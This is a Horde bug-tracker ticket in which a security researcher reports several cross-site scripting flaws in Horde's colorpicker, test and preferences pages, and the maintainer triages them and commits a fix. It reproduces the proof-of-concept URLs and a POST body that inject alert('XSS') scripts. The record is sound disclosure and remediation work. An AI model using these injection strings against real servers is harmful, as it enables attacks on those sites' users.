[#8399] Number preferences are not validated properly
Summary Number preferences are not validated properly
Queue Horde Base
Queue Version HEAD
Type Bug
State Resolved
Priority 2. Medium
Owners Chuck Hagenbuch <chuck (at) horde (dot) org>
Requester security (at) davidwharton (dot) us
Created 07/03/09 (258 days ago)
Due
Updated 07/11/09 (250 days ago)
Assigned 07/11/09 (250 days ago)
Resolved 07/11/09 (250 days ago)
Attachments
Milestone 3.3.5
Patch No

History
07/11/09 Chuck Hagenbuch Comment #4
Taken from Horde DevelopersHorde Developers
State ⇒ Resolved		 Reply to this comment
Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).
07/11/09 CVS Commit Comment #3 Reply to this comment
Changes have been made in CVS for this ticket:

http://cvs.horde.org/diff.php/framework/Prefs/Prefs/UI.php?rt=horde&r1=1.104&r2=1.105&ty=u
http://cvs.horde.org/diff.php/horde/docs/CHANGES?rt=horde&r1=1.1239&r2=1.1240&ty=u
http://cvs.horde.org/diff.php/horde/lib/prefs.php?rt=horde&r1=1.53&r2=1.54&ty=u
07/11/09 Chuck Hagenbuch Comment #2
Milestone ⇒ 3.3.5
Version ⇒ HEAD
State ⇒ Assigned
Summary ⇒ Number preferences are not validated properly
Assigned to Horde DevelopersHorde Developers
Assigned to Chuck Hagenbuch		 Reply to this comment
Multiple cross site scripting vulnerabilites exist.  Proof of concepts:
Horde 3.1 has been deprecated for a long time. The current stable 
version is 3.3, and we backport serious security fixes to 3.2.
http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
This file doesn't exist in 3.2 or later.
https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>
This was fixed almost 2 years ago, before 3.2.0:

http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9
POST to http://hordeserver.com/horde/services/prefs.php with the
following content:
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on



This I can actually reproduce as a problem. Patch forthcoming.
07/03/09 security (at) davidwharton (dot) us Comment #1
State ⇒ Unconfirmed
Patch ⇒
Milestone ⇒
Queue ⇒ Horde Base
Summary ⇒ Multiple Cross Site Scripting Vulnerabilities
Type ⇒ Bug
Priority ⇒ 2. Medium		 Reply to this comment
Multiple cross site scripting vulnerabilites exist.  Proof of concepts:



http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>



https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["



https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>



POST to http://hordeserver.com/horde/services/prefs.php with the 
following content:



actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on